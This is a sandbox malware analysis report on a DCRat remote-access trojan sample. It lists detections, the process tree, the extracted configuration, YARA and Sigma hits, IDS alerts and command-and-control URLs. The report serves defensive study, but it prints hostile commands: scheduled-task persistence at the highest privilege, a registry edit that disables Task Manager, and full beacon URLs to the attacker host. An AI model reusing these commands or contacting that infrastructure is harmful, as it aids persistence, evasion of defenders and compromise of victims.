Windows Analysis Report
adKGhCOOzg.exe

Overview

General Information

Sample name: adKGhCOOzg.exe (renamed because original name is a hash value)
Original sample name: 3b5ae0315b4623a6bd2c711bc8b8e28f.exe
Analysis ID: 1520355
MD5: 3b5ae0315b4623a6bd2c711bc8b8e28f
SHA1: ff99120c5150373aba0c519417fa4b545c70d4ca
SHA256: af20afbe249de8d37ecdae69670fdced02fdfbbfdf7a1f2810e7628b52e29e4c
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • adKGhCOOzg.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\adKGhCOOzg.exe" MD5: 3B5AE0315B4623A6BD2C711BC8B8E28F)
    • wscript.exe (PID: 7540 cmdline: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7632 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • SurrogateContainerAgent.exe (PID: 7676 cmdline: "C:\portcontainerRef\SurrogateContainerAgent.exe" MD5: 7AF97370DBD8A244A113783A7021E677)
          • schtasks.exe (PID: 8116 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8172 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7276 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1704 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 7 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1052 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 728 cmdline: schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 5 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 1136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7092 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
        • reg.exe (PID: 7500 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 2156 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
    • wscript.exe (PID: 2552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 5336 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
        • wscript.exe (PID: 4944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 5376 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
            • wscript.exe (PID: 352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
              • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 3420 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
                • wscript.exe (PID: 1056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                  • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 4460 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
                    • wscript.exe (PID: 8000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                      • zTShuhFeOCWKXCInUCSTgJmE.exe (PID: 3592 cmdline: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe MD5: 7AF97370DBD8A244A113783A7021E677)
                        • wscript.exe (PID: 3896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                        • wscript.exe (PID: 7792 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                    • wscript.exe (PID: 7000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                • wscript.exe (PID: 1816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • wscript.exe (PID: 1132 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 7620 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 2624 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
Malware Configuration Extractor: DCRat {"SCRT": "{\"A\":\"#\",\"L\":\"|\",\"N\":\"*\",\"I\":\".\",\"K\":\"&\",\"y\":\"-\",\"U\":\"_\",\"n\":\",\",\"R\":\"(\",\"M\":\")\",\"J\":\"@\",\"T\":\"<\",\"6\":\"%\",\"e\":\"$\",\"Z\":\"`\",\"X\":\";\",\"0\":\"^\",\"i\":\">\",\"F\":\"~\",\"C\":\" \",\"d\":\"!\"}", "PCRT": "{\"x\":\"(\",\"1\":\"|\",\"Z\":\"$\",\"Q\":\"%\",\"l\":\"&\",\"B\":\"<\",\"V\":\"@\",\"M\":\"`\",\"3\":\">\",\"U\":\"-\",\"i\":\"!\",\"K\":\",\",\"5\":\".\",\"k\":\" \",\"H\":\";\",\"a\":\"_\",\"E\":\"^\",\"0\":\"*\",\"F\":\"#\",\"r\":\"~\",\"L\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-3iI7MItHmWcowgxJeEuX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
Source | Rule | Description | Author | Strings
00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
(5 of 16 entries shown)
Source | Rule | Description | Author | Strings
5.2.SurrogateContainerAgent.exe.37f5750.7.raw.unpack | INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Detects executables referencing many base64-encoded IR and analysis tools names | ditekSHen | (see below)
  • 0x111dc:$s4: cHJvY2V4cA
  • 0x11b24:$s4: cHJvY2V4cA
  • 0x1121d:$s5: cHJvY2V4cDY0
  • 0x11b65:$s5: cHJvY2V4cDY0
  • 0x11119:$s12: d2lyZXNoYXJr
  • 0x11a61:$s12: d2lyZXNoYXJr
  • 0x10fc2:$s23: ZG5zcHk
  • 0x1190a:$s23: ZG5zcHk
  • 0x10fcb:$s25: aWxzcHk
  • 0x11913:$s25: aWxzcHk
  • 0x10fd4:$s26: ZG90cGVla
  • 0x1191c:$s26: ZG90cGVla
42.2.zTShuhFeOCWKXCInUCSTgJmE.exe.3772f08.5.raw.unpack | INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Detects executables referencing many base64-encoded IR and analysis tools names | ditekSHen | (same strings as above)
31.2.zTShuhFeOCWKXCInUCSTgJmE.exe.335e9c0.0.raw.unpack | INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Detects executables referencing many base64-encoded IR and analysis tools names | ditekSHen | (same strings as above)
20.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2e04cc8.6.raw.unpack | INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Detects executables referencing many base64-encoded IR and analysis tools names | ditekSHen | (same strings as above)
39.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2c3e770.1.raw.unpack | INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Detects executables referencing many base64-encoded IR and analysis tools names | ditekSHen | (same strings as above)

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentImage: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentProcessId: 2156, ParentProcessName: zTShuhFeOCWKXCInUCSTgJmE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , ProcessId: 2552, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentImage: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentProcessId: 2156, ParentProcessName: zTShuhFeOCWKXCInUCSTgJmE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , ProcessId: 2552, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentImage: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ParentProcessId: 2156, ParentProcessName: zTShuhFeOCWKXCInUCSTgJmE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" , ProcessId: 2552, ProcessName: wscript.exe
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\adKGhCOOzg.exe", ParentImage: C:\Users\user\Desktop\adKGhCOOzg.exe, ParentProcessId: 7456, ParentProcessName: adKGhCOOzg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" , ProcessId: 7540, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T08:42:23.336887+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49714 | 141.8.194.149 | 80 | TCP
2024-09-27T08:42:44.758842+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49715 | 141.8.194.149 | 80 | TCP
2024-09-27T08:42:57.134633+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49716 | 141.8.194.149 | 80 | TCP
2024-09-27T08:43:21.620955+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49718 | 141.8.194.149 | 80 | TCP
2024-09-27T08:43:36.033260+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49719 | 141.8.194.149 | 80 | TCP
2024-09-27T08:43:53.823199+0200 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.9 | 49720 | 141.8.194.149 | 80 | TCP

AV Detection

Source: adKGhCOOzg.exe, Avira: detected
Source: http://a1025223.xsph.ru/, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtr, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme, Avira URL Cloud: Label: malware
Source: http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\portcontainerRef\myQbMgAKm.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs, Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs, Avira: detection malicious, Label: VBS/Starter.VPVT
Source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"SCRT": "{\"A\":\"#\",\"L\":\"|\",\"N\":\"*\",\"I\":\".\",\"K\":\"&\",\"y\":\"-\",\"U\":\"_\",\"n\":\",\",\"R\":\"(\",\"M\":\")\",\"J\":\"@\",\"T\":\"<\",\"6\":\"%\",\"e\":\"$\",\"Z\":\"`\",\"X\":\";\",\"0\":\"^\",\"i\":\">\",\"F\":\"~\",\"C\":\" \",\"d\":\"!\"}", "PCRT": "{\"x\":\"(\",\"1\":\"|\",\"Z\":\"$\",\"Q\":\"%\",\"l\":\"&\",\"B\":\"<\",\"V\":\"@\",\"M\":\"`\",\"3\":\">\",\"U\":\"-\",\"i\":\"!\",\"K\":\",\",\"5\":\".\",\"k\":\" \",\"H\":\";\",\"a\":\"_\",\"E\":\"^\",\"0\":\"*\",\"F\":\"#\",\"r\":\"~\",\"L\":\")\"}", "TAG": "", "MUTEX": "DCR_MUTEX-3iI7MItHmWcowgxJeEuX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
Source: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe, ReversingLabs: Detection: 87%
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, ReversingLabs: Detection: 87%
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, ReversingLabs: Detection: 87%
Source: adKGhCOOzg.exe, ReversingLabs: Detection: 71%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe, Joe Sandbox ML: detected
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe, Joe Sandbox ML: detected
Source: adKGhCOOzg.exe, Joe Sandbox ML: detected
Source: adKGhCOOzg.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: adKGhCOOzg.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: adKGhCOOzg.exe
Source: C:\Users\user\Desktop\adKGhCOOzg.exe, Code function: 0_2_0034A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0034A5F4
Source: C:\Users\user\Desktop\adKGhCOOzg.exe, Code function: 0_2_0035B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0035B8E0
Source: C:\Users\user\Desktop\adKGhCOOzg.exe, Code function: 0_2_0036AAA8 FindFirstFileExA,0_2_0036AAA8
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, File opened: C:\Users\user\AppData\Local
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, File opened: C:\Users\user\AppData
